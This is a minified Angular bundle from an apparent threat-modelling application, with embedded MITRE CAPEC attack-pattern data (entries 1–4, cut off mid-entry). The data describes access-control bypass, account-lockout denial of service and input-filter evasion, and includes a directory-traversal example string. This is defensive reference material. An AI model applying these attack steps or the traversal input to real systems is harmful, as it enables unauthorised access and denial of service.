_pt(t,a){if(1&t&&(m(0,"div",1),s(1,"\n  "),m(2,"h2"),s(3),u(),s(4,"\n  "),it(5,"app-threat-actor",2),s(6,"\n"),u()),2&t){const e=B();C(3),ke(e.selectedNode.name()),C(2),V("threatActor",e.selectedThreatActor)}}let gpt=(()=>{class t extends xa{constructor(e,i,n,r){super(),this.theme=e,this.dataService=i,this.dialog=n,this.translate=r}get selectedThreatActor(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Gp?this.selectedNode.data:null}ngOnInit(){setTimeout(()=>{this.createNodes()},100)}createNodes(){const e=this.Nodes;this.Nodes=[];let i=(r,c)=>{let d={name:()=>r.Name,canSelect:!0,data:r,canRename:!0,onRename:T=>{r.Name=T},canDelete:!0,onDelete:()=>{this.dialog.OpenDeleteObjectDialog(r).subscribe(T=>{T&&(this.dataService.Config.DeleteThreatActor(r),this.selectedNode==d&&(this.selectedNode=null),this.createNodes())})},canMoveUpDown:!0,onMoveUp:()=>{let T=this.dataService.Config.GetThreatActors();if(0!=T.findIndex(k=>k.ID==r.ID)){let k=T.findIndex(q=>q.ID==r.ID);T.splice(k,0,T.splice(k-1,1)[0]),c.children.splice(k,0,c.children.splice(k-1,1)[0])}},onMoveDown:()=>{let T=this.dataService.Config.GetThreatActors();if(T.findIndex(k=>k.ID==r.ID)!=T.length-1){let k=T.findIndex(q=>q.ID==r.ID);T.splice(k,0,T.splice(k+1,1)[0]),c.children.splice(k,0,c.children.splice(k+1,1)[0])}}};return d},n={name:()=>this.translate.instant("general.ThreatSources"),canSelect:!1,canAdd:!0,hasMenu:!0,icon:"portrait",onAdd:()=>{let r=this.dataService.Config.CreateThreatActor();this.createNodes(),this.selectedNode=this.FindNodeOfObject(r),this.selectedNode.isRenaming=!0},children:[]};this.dataService.Config.GetThreatActors().forEach(r=>n.children.push(i(r,n))),this.Nodes.push(n),xa.TransferExpandedState(e,this.Nodes),this.nodeTreeChanged.emit(this.Nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-sources"]],features:[ci],decls:1,vars:1,consts:[["style","margin-left: 10px; margin-right: 10px;",4,"ngIf"],[2,"margin-left","10px","margin-right","10px"],[3,"threatActor"]],template:function(e,i){1&e&&ne(0,_pt,7,2,"div",0),2&e&&V("ngIf",i.selectedNode)},dependencies:[Ri,xZ],styles:[".property-form-field[_ngcontent-%COMP%]{width:300px}"]}),t})();function Cpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"view_module"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"pages.config.Stencils"),"\n              "))}function ypt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-stencils",13),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)}}function bpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"code"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"pages.config.SoftwareComponents"),"\n              "))}function Mpt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-components",14),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)("componentType",1)}}function vpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"policy"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"pages.config.ProcessComponents"),"\n              "))}function Apt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-components",14),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)("componentType",2)}}function Tpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"portrait"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"pages.config.ThreatSources"),"\n              "))}function Ept(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-threat-sources",13),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)}}function Dpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"flash_on"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"pages.config.ThreatCategories"),"\n              "))}function xpt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-threat-categories",13),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)}}function wpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"library_books"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"pages.config.ThreatLibrary"),"\n              "))}function Ipt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-threat-library",13),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)}}function Rpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"rule"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"pages.config.CPDFDRules"),"\n              "))}function Spt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-rules",13),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)}}function kpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"security"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"general.Controls"),"\n              "))}function Ppt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-controls",13),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)}}function Opt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"account_balance"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"general.Assets"),"\n              "))}function Npt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-assets",15),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("isProject",!1)("assetGroup",e.dataService.Config.AssetGroups)("selectedNode",e.selectedNode)}}function Lpt(t,a){1&t&&(s(0,"\n                "),m(1,"mat-icon",12),s(2,"fact_check"),u(),s(3),oe(4,"translate")),2&t&&(C(3),ct("\n                ",re(4,1,"general.Checklists"),"\n              "))}function zpt(t,a){if(1&t){const e=Ye();s(0,"\n                "),m(1,"app-checklists",13),he("nodeTreeChanged",function(n){return be(e),Me(B().SetNavTreeData(n))}),u(),s(2,"\n              ")}if(2&t){const e=B();C(1),V("selectedNode",e.selectedNode)}}const Wpt=[{path:"configuration",component:(()=>{class t extends CT{constructor(e,i,n,r,c,d){super(),this.theme=e,this.dataService=i,this.locStorageService=n,this.dialog=r,this.router=c,this.route=d}get selectedNode(){return this._selectedNode}set selectedNode(e){this._selectedNode=e}ngOnInit(){if(this.dataService.Project){let e=!0;const i=this.locStorageService.Get(si.DIALOG_WARNING_CONSENT);if(i){const n=new Date(i),r=new Date;e=!(n.getMonth()==r.getMonth()&&n.getDate()==r.getDate())}if(e){const n={consent:!1,remember:!1};this.dialog.open(fut,{hasBackdrop:!1,data:n}).afterClosed().subscribe(c=>{c&&n.remember&&this.locStorageService.Set(si.DIALOG_WARNING_CONSENT,(new Date).toString())})}}this.router.events.subscribe(e=>{e instanceof Ph&&this.route.queryParams.subscribe(i=>{null!=i.index&&this.SetSelectedTabIndex(i.index)})})}GetSelectedTabIndex(){let e=this.locStorageService.Get(si.PAGE_CONFIG_TAB_INDEX);return null!=e?e:0}SetSelectedTabIndex(e){this.selectedNode=null,this.locStorageService.Set(si.PAGE_CONFIG_TAB_INDEX,e)}GetSplitSize(){let e=this.locStorageService.Get(si.PAGE_CONFIG_SPLIT_SIZE_1);return null!=e?Number(e):350}OnSplitSizeChange(e){this.locStorageService.Set(si.PAGE_CONFIG_SPLIT_SIZE_1,e.sizes[0])}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(_r),Ee(vu),Ee(Oo),Ee(Tl))},t.\u0275cmp=Wt({type:t,selectors:[["app-configuration"]],features:[ci],decls:101,vars:21,consts:[["color","primary",1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/configuration",2,"width","100%","height","100%",3,"sameRoute"],["direction","horizontal","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[3,"size","visible","order"],[3,"activeNode","selectedNodeChanged"],["navTree",""],[3,"size","order"],[2,"height","100%",3,"selectedIndex","selectedIndexChange"],["mat-tab-label",""],["matTabContent",""],[1,"tab-icon"],[3,"selectedNode","nodeTreeChanged"],[3,"selectedNode","componentType","nodeTreeChanged"],[3,"isProject","assetGroup","selectedNode","nodeTreeChanged"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-drawer-container",1),s(3,"\n    "),m(4,"mat-drawer",2),s(5,"\n      "),m(6,"app-side-nav",3),he("sameRoute",function(){return i.OnSameRoute()}),u(),s(7,"\n    "),u(),s(8,"\n\n    "),m(9,"mat-drawer-content"),s(10,"\n      "),m(11,"as-split",4),he("dragEnd",function(r){return i.OnSplitSizeChange(r)}),s(12,"\n        "),m(13,"as-split-area",5),s(14,"\n          "),m(15,"app-nav-tree",6,7),he("selectedNodeChanged",function(r){return i.selectedNode=r}),u(),s(17,"\n        "),u(),s(18,"\n        "),m(19,"as-split-area",8),s(20,"\n          "),m(21,"mat-tab-group",9),he("selectedIndexChange",function(r){return i.SetSelectedTabIndex(r)}),s(22,"\n            "),m(23,"mat-tab"),s(24,"\n              "),ne(25,Cpt,5,3,"ng-template",10),s(26,"\n              "),ne(27,ypt,3,1,"ng-template",11),s(28,"\n            "),u(),s(29,"\n\n            "),m(30,"mat-tab"),s(31,"\n              "),ne(32,bpt,5,3,"ng-template",10),s(33,"\n              "),ne(34,Mpt,3,2,"ng-template",11),s(35,"\n            "),u(),s(36,"\n\n            "),m(37,"mat-tab"),s(38,"\n              "),ne(39,vpt,5,3,"ng-template",10),s(40,"\n              "),ne(41,Apt,3,2,"ng-template",11),s(42,"\n            "),u(),s(43,"\n\n            "),m(44,"mat-tab"),s(45,"\n              "),ne(46,Tpt,5,3,"ng-template",10),s(47,"\n              "),ne(48,Ept,3,1,"ng-template",11),s(49,"\n            "),u(),s(50,"\n\n            "),m(51,"mat-tab"),s(52,"\n              "),ne(53,Dpt,5,3,"ng-template",10),s(54,"\n              "),ne(55,xpt,3,1,"ng-template",11),s(56,"\n            "),u(),s(57,"\n\n            "),m(58,"mat-tab"),s(59,"\n              "),ne(60,wpt,5,3,"ng-template",10),s(61,"\n              "),ne(62,Ipt,3,1,"ng-template",11),s(63,"\n            "),u(),s(64,"\n\n            "),m(65,"mat-tab"),s(66,"\n              "),ne(67,Rpt,5,3,"ng-template",10),s(68,"\n              "),ne(69,Spt,3,1,"ng-template",11),s(70,"\n            "),u(),s(71,"\n\n            "),m(72,"mat-tab"),s(73,"\n              "),ne(74,kpt,5,3,"ng-template",10),s(75,"\n              "),ne(76,Ppt,3,1,"ng-template",11),s(77,"\n            "),u(),s(78,"\n\n            "),m(79,"mat-tab"),s(80,"\n              "),ne(81,Opt,5,3,"ng-template",10),s(82,"\n              "),ne(83,Npt,3,3,"ng-template",11),s(84,"\n            "),u(),s(85,"\n\n            "),m(86,"mat-tab"),s(87,"\n              "),ne(88,Lpt,5,3,"ng-template",10),s(89,"\n              "),ne(90,zpt,3,1,"ng-template",11),s(91,"\n            "),u(),s(92,"\n          "),u(),s(93,"\n        "),u(),s(94,"\n      "),u(),s(95,"\n    "),u(),s(96,"\n  "),u(),s(97,"\n  "),it(98,"app-status-bar"),s(99,"\n"),u(),s(100,"\n")),2&e&&(C(9),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),C(2),V("gutterSize",3)("restrictMove",!0),C(2),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),V("size",i.GetSplitSize())("visible",i.showLeftBar)("order",1),C(2),V("activeNode",i.selectedNode),C(4),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size","*")("order",2),C(2),V("selectedIndex",i.GetSelectedTabIndex()))},dependencies:[Zh,Dp,oa,_u,gu,Nd,qh,V1,Mu,Uh,pf,_f,df,Fht,$ht,Tft,xft,kft,DZ,Qft,hpt,gpt,Xi],styles:[".primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}  .mat-tab-labels{display:block!important}  .mat-tab-labels .mat-tab-label{padding:0 10px!important}  .mat-tab-label{min-width:100px!important}"]}),t})()}];let Fpt=(()=>{class t{}return t.\u0275fac=function(e){return new(e||t)},t.\u0275mod=yi({type:t}),t.\u0275inj=Ci({imports:[rn,Ms.forChild(Wpt),Ms]}),t})();const Qp=JSON.parse('{"1":{"ID":"1","Name":"Accessing Functionality Not Properly Constrained by ACLs","Abstraction":"Standard","Status":"Draft","Description":"In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application\'s functionality; particularly URL\'s for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"122"},{"Nature":"CanPrecede","CAPEC_ID":"17"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey] The attacker surveys the target application, possibly as a valid and authenticated user","Technique":["Spidering web sites for all available links","Brute force guessing of resource names","Brute force guessing of user names / credentials","Brute force guessing of function names / actions"]},{"Step":"2","Phase":"Explore","Description":"[Identify Functionality] At each step, the attacker notes the resource or functionality access mechanism invoked upon performing specific actions","Technique":["Use the web inventory of all forms and inputs and apply attack data to those inputs.","Use a packet sniffer to capture and record network traffic","Execute the software in a debugger and record API calls into the operating system or important libraries. This might occur in an environment other than a production environment, in order to find weaknesses that can be exploited in a production environment."]},{"Step":"3","Phase":"Experiment","Description":"[Iterate over access capabilities] Possibly as a valid user, the attacker then tries to access each of the noted access mechanisms directly in order to perform functions not constrained by the ACLs.","Technique":"Fuzzing of API parameters (URL parameters, OS API parameters, protocol parameters)"}]},"Prerequisites":{"Prerequisite":["The application must be navigable in a manner that associates elements (subsections) of the application with ACLs.","The various resources, or individual URLs, must be somehow discoverable by the attacker","The administrator must have forgotten to associate an ACL or has associated an inappropriately permissive ACL with a particular navigable resource."]},"Skills_Required":{"Skill":["In order to discover unrestricted resources, the attacker does not need special tools or skills. They only have to observe the resources or access mechanisms invoked as each action is performed and then try and access those access mechanisms directly.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":{"p":["In a J2EE setting, administrators can associate a role that is impossible for the authenticator to grant users, such as \\"NoAccess\\", with all Servlets to which access is guarded by a limited number of servlets visible to, and accessible by, the user.","Having done so, any direct access to those protected Servlets will be prohibited by the web container.","In a more general setting, the administrator must mark every resource besides the ones supposed to be exposed to the user as accessible by a role impossible for the user to assume. The default security setting must be to deny access and then grant access only to those resources intended by business logic."]}},"Example_Instances":{"Example":{"p":["Implementing the Model-View-Controller (MVC) within Java EE\'s Servlet paradigm using a \\"Single front controller\\" pattern that demands that brokered HTTP requests be authenticated before hand-offs to other Action Servlets.","If no security-constraint is placed on those Action Servlets, such that positively no one can access them, the front controller can be subverted."]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"276"},{"CWE_ID":"285"},{"CWE_ID":"434"},{"CWE_ID":"693"},{"CWE_ID":"732"},{"CWE_ID":"1193"},{"CWE_ID":"1220"},{"CWE_ID":"1297"},{"CWE_ID":"1311"},{"CWE_ID":"1314"},{"CWE_ID":"1315"},{"CWE_ID":"1318"},{"CWE_ID":"1320"},{"CWE_ID":"1321"},{"CWE_ID":"1327"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1574.010","Entry_Name":"Hijack Execution Flow: ServicesFile Permissions Weakness"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Pattern, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Pattern, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Weaknesses, Skills_Required, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Related_Weaknesses"}]}},"2":{"ID":"2","Name":"Inducing Account Lockout","Abstraction":"Standard","Status":"Draft","Description":"An attacker leverages the security functionality of the system aimed at thwarting potential attacks to launch a denial of service attack against a legitimate system user. Many systems, for instance, implement a password throttling mechanism that locks an account after a certain number of incorrect log in attempts. An attacker can leverage this throttling mechanism to lock a legitimate user out of their own account. The weakness that is being leveraged by an attacker is the very security feature that has been put in place to counteract attacks.","Likelihood_Of_Attack":"High","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"212","Exclude_Related":{"Exclude_ID":"515"}}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Experiment","Description":"[Investigate account lockout behavior of system] Investigate the security features present in the system that may trigger an account lockout","Technique":["Analyze system documentation to find list of events that could potentially cause account lockout","Obtain user account in system and attempt to lock it out by sending malformed or incorrect data repeatedly","Determine another user\'s login ID, and attempt to brute force the password (or other credentials) for it a predetermined number of times, or until the system provides an indication that the account is locked out."]},{"Step":"2","Phase":"Experiment","Description":"[Obtain list of user accounts to lock out] Generate a list of valid user accounts to lock out","Technique":["Obtain list of authorized users using another attack pattern, such as SQL Injection.","Attempt to create accounts if possible; system should indicate if a user ID is already taken.","Attempt to brute force user IDs if system reveals whether a given user ID is valid or not upon failed login attempts."]},{"Step":"3","Phase":"Exploit","Description":"[Lock Out Accounts] Perform lockout procedure for all accounts that the attacker wants to lock out.","Technique":"For each user ID to be locked out, perform the lockout procedure discovered in the first step."}]},"Prerequisites":{"Prerequisite":["The system has a lockout mechanism.","An attacker must be able to reproduce behavior that would result in an account being locked."]},"Skills_Required":{"Skill":["No programming skills or computer knowledge is needed. An attacker can easily use this attack pattern following the Execution Flow above.",{"Level":"Low"}]},"Resources_Required":{"Resource":"Computer with access to the login portion of the target system"},"Consequences":{"Consequence":{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"}},"Mitigations":{"Mitigation":["Implement intelligent password throttling mechanisms such as those which take IP address into account, in addition to the login name.","When implementing security features, consider how they can be misused and made to turn on themselves."]},"Example_Instances":{"Example":"A famous example of this type an attack is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder\'s account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"645"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1531","Entry_Name":"Account Access Removal"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"3":{"ID":"3","Name":"Using Leading \'Ghost\' Character Sequences to Bypass Input Filters","Abstraction":"Detailed","Status":"Draft","Description":"Some APIs will strip certain leading characters from a string of parameters. An adversary can intentionally introduce leading \\"ghost\\" characters (extra characters that don\'t affect the validity of the request at the API layer) that enable the input to pass the filters and therefore process the adversary\'s input. This occurs when the targeted API will accept input data in several syntactic forms and interpret it in the equivalent semantic way, while the filter does not take into account the full spectrum of the syntactic forms acceptable to the targeted API.","Likelihood_Of_Attack":"Medium","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"Determine if the source code is available and if so, examine the filter logic."},{"Step":"2","Phase":"Experiment","Description":"If the source code is not available, write a small program that loops through various possible inputs to given API call and tries a variety of alternate (but equivalent) encodings of strings with leading ghost characters. Knowledge of frameworks and libraries used and what filters they apply will help to make this search more structured."},{"Step":"3","Phase":"Experiment","Description":"Observe the effects. See if the probes are getting past the filters. Identify a string that is semantically equivalent to that which an adversary wants to pass to the targeted API, but syntactically structured in a way as to get past the input filter. That encoding will contain certain ghost characters that will help it get past the filters. These ghost characters will be ignored by the targeted API."},{"Step":"4","Phase":"Exploit","Description":"Once the \\"winning\\" alternate encoding using (typically leading) ghost characters is identified, an adversary can launch the attacks against the targeted API (e.g. directory traversal attack, arbitrary shell command execution, corruption of files)"}]},"Prerequisites":{"Prerequisite":"The targeted API must ignore the leading ghost characters that are used to get past the filters for the semantics to be the same."},"Skills_Required":{"Skill":["The ability to make an API request, and knowledge of \\"ghost\\" characters that will not be filtered by any input validation. These \\"ghost\\" characters must be known to not affect the way in which the request will be interpreted.",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":["Use an allowlist rather than a denylist input validation.","Canonicalize all data prior to validation.","Take an iterative approach to input validation (defense in depth)."]},"Example_Instances":{"Example":{"p":["Alternate Encoding with Ghost Characters in FTP and Web Servers","Some web and FTP servers fail to detect prohibited upward directory traversals if the user-supplied pathname contains extra characters such as an extra leading dot. For example, a program that will disallow access to the pathname \\"../test.txt\\" may erroneously allow access to that file if the pathname is specified as \\".../test.txt\\". This attack succeeds because 1) the input validation logic fails to detect the triple-dot as a directory traversal attempt (since it isn\'t dot-dot), 2) some part of the input processing decided to strip off the \\"extra\\" dot, leaving the dot-dot behind.","Using the file system API as the target, the following strings are all equivalent to many programs:","As you can see, there are many ways to make a semantically equivalent request. All these strings ultimately result in a request for the file ../test.txt."],"div":[".../../../test.txt",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"173"},{"CWE_ID":"41"},{"CWE_ID":"172"},{"CWE_ID":"179"},{"CWE_ID":"180"},{"CWE_ID":"181"},{"CWE_ID":"183"},{"CWE_ID":"184"},{"CWE_ID":"20"},{"CWE_ID":"74"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Phases, Description Summary, Payload"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"4":{"ID":"4","Name":"Using Alternative IP Address Encodings","Abstraction":"Detailed","Status":"Draft","Description":"This attack relies on the attacker using unexpected formats for representing IP addresses. Networked applications may expect network location information in a specific format, such as fully qualified domains names (FQDNs), URL, IP address, or IP Address ranges. If the location information is not validated against a 